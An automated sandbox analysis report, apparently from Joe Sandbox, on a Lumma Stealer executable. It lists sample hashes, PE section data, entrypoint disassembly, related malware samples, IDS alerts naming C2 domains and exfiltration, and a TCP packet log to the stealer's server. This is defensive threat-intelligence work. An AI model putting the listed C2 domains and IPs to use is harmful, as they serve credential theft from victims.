                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                            Simulations

                                                                                            Behavior and APIs

                                                                                            TimeTypeDescription
                                                                                            02:36:32API Interceptor9x Sleep call for process: 661fW9gxDp.exe modified

                                                                                            Joe Sandbox View / Context

                                                                                            IPs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            104.21.64.80S6oj0LoSiL.exeGet hashmaliciousLummaCBrowse
                                                                                              file.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYSBrowse
                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                  rK0CtrtVrl.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                    CefJcYwgWs.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                      tdMnK5A1pe.exeGet hashmaliciousLummaCBrowse
                                                                                                        3DI3mOIlxE.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                          Lw1k8a7gQu.exeGet hashmaliciousLummaCBrowse
                                                                                                            random.exe.2.exeGet hashmaliciousLummaCBrowse
                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse

                                                                                                                Domains

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                s-part-0035.t-0009.t-msedge.nethttps://forms.office.com/Pages/ShareFormPage.aspx?id=z5Knz2h3QUOIV4F1TCr6H8l1dBxA_RZAr7lBOGCmz8VURUlLQURGTlFGTEQ0QzdESlFMT1lGUlpRWi4u&sharetoken=rKEHIuU7H8od3T6m0C0ZGet hashmaliciousUnknownBrowse
                                                                                                                • 13.107.246.63
                                                                                                                S6oj0LoSiL.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 13.107.246.63
                                                                                                                pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                                • 13.107.246.63
                                                                                                                NVkyG9HAeY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                • 13.107.246.63
                                                                                                                SEPTobn3BR.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                • 13.107.246.63
                                                                                                                Brooming.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                • 13.107.246.63
                                                                                                                Gosjeufon.cpl.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 13.107.246.63
                                                                                                                #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • 13.107.246.63
                                                                                                                doc55334.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 13.107.246.63
                                                                                                                3DI3mOIlxE.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                • 13.107.246.63
                                                                                                                grannyejh.latS6oj0LoSiL.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.64.80
                                                                                                                AWrVzd6XpC.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                • 172.67.179.109
                                                                                                                469oyXQbRY.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.179.109
                                                                                                                file.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYSBrowse
                                                                                                                • 104.21.64.80
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                • 172.67.179.109
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                • 104.21.64.80
                                                                                                                rK0CtrtVrl.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                • 104.21.64.80
                                                                                                                NHEXQatKdE.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.179.109
                                                                                                                CefJcYwgWs.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                • 104.21.64.80
                                                                                                                tdMnK5A1pe.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.64.80

                                                                                                                ASNs

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                CLOUDFLARENETUSbPkG0wTVon.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 104.16.184.241
                                                                                                                66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 172.67.177.134
                                                                                                                S6oj0LoSiL.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.64.80
                                                                                                                pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                                • 172.64.41.3
                                                                                                                dlhost.exeGet hashmaliciousXWormBrowse
                                                                                                                • 104.20.4.235
                                                                                                                c2A6GRyAwn.dllGet hashmaliciousNitolBrowse
                                                                                                                • 104.21.42.47
                                                                                                                script.htaGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                • 104.26.12.205
                                                                                                                c2A6GRyAwn.dllGet hashmaliciousNitolBrowse
                                                                                                                • 104.21.42.47
                                                                                                                AWrVzd6XpC.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                • 172.67.209.202
                                                                                                                Brooming.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                • 104.21.86.72

                                                                                                                JA3 Fingerprints

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                a0e9f5d64349fb13191bc781f81f42e1S6oj0LoSiL.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.64.80
                                                                                                                SEPTobn3BR.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                • 104.21.64.80
                                                                                                                Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                • 104.21.64.80
                                                                                                                AWrVzd6XpC.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                • 104.21.64.80
                                                                                                                469oyXQbRY.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.64.80
                                                                                                                file.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYSBrowse
                                                                                                                • 104.21.64.80
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                • 104.21.64.80
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                • 104.21.64.80
                                                                                                                https://d2kjcgrb1q4xt7.cloudfront.net/mULiCoBDj2Ug.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 104.21.64.80
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                • 104.21.64.80

                                                                                                                Dropped Files

                                                                                                                No context

                                                                                                                Created / dropped Files

                                                                                                                No created / dropped files found

                                                                                                                Static File Info

                                                                                                                General

                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Entropy (8bit):7.946439369688254
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                File name:661fW9gxDp.exe
                                                                                                                File size:1'841'664 bytes
                                                                                                                MD5:18c608e128d658aef6e267668ddb68e2
                                                                                                                SHA1:8da573d37440d3761aa89abec9f9efc0ee8773a6
                                                                                                                SHA256:1fe8d27012da0553ebe43b42313f32264779c2bc697df26bba458348dfec6607
                                                                                                                SHA512:5fed80391acc4b402d276ffcc22b8ae5c19b02be52021a6776b85d30e13b3c52c901c04e42b77083d0ab4ad1d5e1ef658de943deec640747289d1e117b4aa99d
                                                                                                                SSDEEP:24576:ezgUbVUt+ahQJrqTkAJxupr721WgNqHNewarWr6CGSpSG2qsSWIrrYt2:ezgF+aWJrqD+pG1WgGfuzG2BSWIrrw
                                                                                                                TLSH:9F8533001E1135E2F4EAC276D55B9FC4AD72B815DCA91E2CEF404F7D06A5B83A906CEE
                                                                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................H...........@...........................H.....9=....@.................................T0..h..

                                                                                                                File Icon

                                                                                                                Icon Hash:00928e8e8686b000

                                                                                                                Static PE Info

                                                                                                                General

                                                                                                                Entrypoint:0x88a000
                                                                                                                Entrypoint Section:.taggant
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:6
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:6
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:6
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                Entrypoint Preview

                                                                                                                Instruction
                                                                                                                jmp 00007F646CBD1B3Ah
                                                                                                                psubb mm3, qword ptr [ebx]
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add cl, ch
                                                                                                                add byte ptr [eax], ah
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [esi], al
                                                                                                                or al, byte ptr [eax]
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], dh
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], cl
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [edx], ah
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [ecx], al
                                                                                                                add byte ptr [eax], 00000000h
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                adc byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                or ecx, dword ptr [edx]
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                xor byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add dword ptr [eax+00000000h], eax
                                                                                                                add byte ptr [eax], al
                                                                                                                adc byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                push es
                                                                                                                or al, byte ptr [eax]
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], dl
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [ebx], al
                                                                                                                or al, byte ptr [eax]
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [esi], al
                                                                                                                add byte ptr [eax], 00000000h
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                adc byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                push es
                                                                                                                or al, byte ptr [eax]
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], dh
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax+eax], bl
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                pop es
                                                                                                                add byte ptr [eax], 00000000h
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al

                                                                                                                Data Directories

                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x530540x68.idata
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x2b0.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x531f80x8.idata
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                Sections

                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                0x10000x510000x24800bfdfa5602f1f7bf6e5e4606edb2b45abFalse0.9974114404965754data7.97782039480764IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .rsrc0x520000x2b00x400b1e85b1cd09caefc2d43268be72ef161False0.3603515625data5.183452444303608IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .idata 0x530000x10000x20019a29171433eeef17e42fd663f137134False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                0x540000x29b0000x2009fc461d7a91687c357f4dab2ff97a918unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                hjbgbzbr0x2ef0000x19a0000x19920084a27d0db752064d63c37c4abf2d225dFalse0.9944742018026276data7.9528967637667956IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                ijeloniv0x4890000x10000x600ac4d7a8f3ff286289d39826abbee8911False0.5989583333333334data5.089694745008545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .taggant0x48a0000x30000x22002d63f03d4525b0fa355db33c764153b3False0.08915441176470588DOS executable (COM)1.1066724538408015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                Resources

                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                RT_MANIFEST0x520580x256ASCII text, with CRLF line terminators0.5100334448160535

                                                                                                                Imports

                                                                                                                DLLImport
                                                                                                                kernel32.dlllstrcpy

                                                                                                                Network Behavior

                                                                                                                Suricata IDS Alerts

                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                2024-12-19T08:36:33.085082+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.9580661.1.1.153UDP
                                                                                                                2024-12-19T08:36:33.224767+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.9654321.1.1.153UDP
                                                                                                                2024-12-19T08:36:34.600746+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.949717104.21.64.80443TCP
                                                                                                                2024-12-19T08:36:34.600746+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949717104.21.64.80443TCP
                                                                                                                2024-12-19T08:36:35.509186+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949717104.21.64.80443TCP
                                                                                                                2024-12-19T08:36:35.509186+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949717104.21.64.80443TCP
                                                                                                                2024-12-19T08:36:36.729541+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.949723104.21.64.80443TCP
                                                                                                                2024-12-19T08:36:36.729541+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949723104.21.64.80443TCP
                                                                                                                2024-12-19T08:36:37.545026+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.949723104.21.64.80443TCP
                                                                                                                2024-12-19T08:36:37.545026+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949723104.21.64.80443TCP
                                                                                                                2024-12-19T08:36:39.215752+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.949728104.21.64.80443TCP
                                                                                                                2024-12-19T08:36:39.215752+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949728104.21.64.80443TCP
                                                                                                                2024-12-19T08:36:41.495031+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.949734104.21.64.80443TCP
                                                                                                                2024-12-19T08:36:41.495031+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949734104.21.64.80443TCP
                                                                                                                2024-12-19T08:36:43.756933+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.949742104.21.64.80443TCP
                                                                                                                2024-12-19T08:36:43.756933+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949742104.21.64.80443TCP
                                                                                                                2024-12-19T08:36:46.568113+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.949749104.21.64.80443TCP
                                                                                                                2024-12-19T08:36:46.568113+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949749104.21.64.80443TCP
                                                                                                                2024-12-19T08:36:47.431200+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.949749104.21.64.80443TCP
                                                                                                                2024-12-19T08:36:49.282619+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.949758104.21.64.80443TCP
                                                                                                                2024-12-19T08:36:49.282619+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949758104.21.64.80443TCP
                                                                                                                2024-12-19T08:36:49.286427+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.949758104.21.64.80443TCP
                                                                                                                2024-12-19T08:36:53.055358+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.949769104.21.64.80443TCP
                                                                                                                2024-12-19T08:36:53.055358+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949769104.21.64.80443TCP

                                                                                                                Network Port Distribution

                                                                                                                TCP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Dec 19, 2024 08:36:33.367808104 CET49717443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:33.367827892 CET44349717104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:33.367899895 CET49717443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:33.371110916 CET49717443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:33.371124029 CET44349717104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:34.600641966 CET44349717104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:34.600745916 CET49717443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:34.607291937 CET49717443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:34.607326031 CET44349717104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:34.607639074 CET44349717104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:34.648840904 CET49717443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:34.719356060 CET49717443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:34.719393969 CET49717443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:34.719484091 CET44349717104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:35.509182930 CET44349717104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:35.509357929 CET44349717104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:35.509418011 CET49717443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:35.511423111 CET49717443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:35.511451006 CET44349717104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:35.519669056 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:35.519722939 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:35.519830942 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:35.520113945 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:35.520131111 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:36.729399920 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:36.729541063 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:36.739363909 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:36.739409924 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:36.739686012 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:36.740967989 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:36.741003990 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:36.741069078 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.545023918 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.545072079 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.545166016 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.545233011 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.545937061 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.545996904 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.546027899 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.547962904 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.548022985 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.548055887 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.557467937 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.557557106 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.557579994 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.565898895 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.565979958 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.566001892 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.617629051 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.664643049 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.711366892 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.736402988 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.740313053 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.740372896 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.740411043 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.740565062 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.740617990 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.740744114 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.740783930 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.740813971 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.740828991 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.984709978 CET49728443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.984746933 CET44349728104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.984812975 CET49728443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.985282898 CET49728443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.985297918 CET44349728104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:39.215637922 CET44349728104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:39.215751886 CET49728443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:39.217032909 CET49728443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:39.217075109 CET44349728104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:39.217317104 CET44349728104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:39.218585014 CET49728443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:39.218725920 CET49728443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:39.218760014 CET44349728104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:40.183635950 CET44349728104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:40.183744907 CET44349728104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:40.183798075 CET49728443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:40.183902025 CET49728443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:40.183917999 CET44349728104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:40.280189037 CET49734443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:40.280231953 CET44349734104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:40.280328035 CET49734443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:40.280627966 CET49734443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:40.280642033 CET44349734104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:41.494929075 CET44349734104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:41.495031118 CET49734443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:41.496414900 CET49734443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:41.496444941 CET44349734104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:41.496838093 CET44349734104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:41.498105049 CET49734443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:41.498291016 CET49734443192.168.2.9104.21.64.80
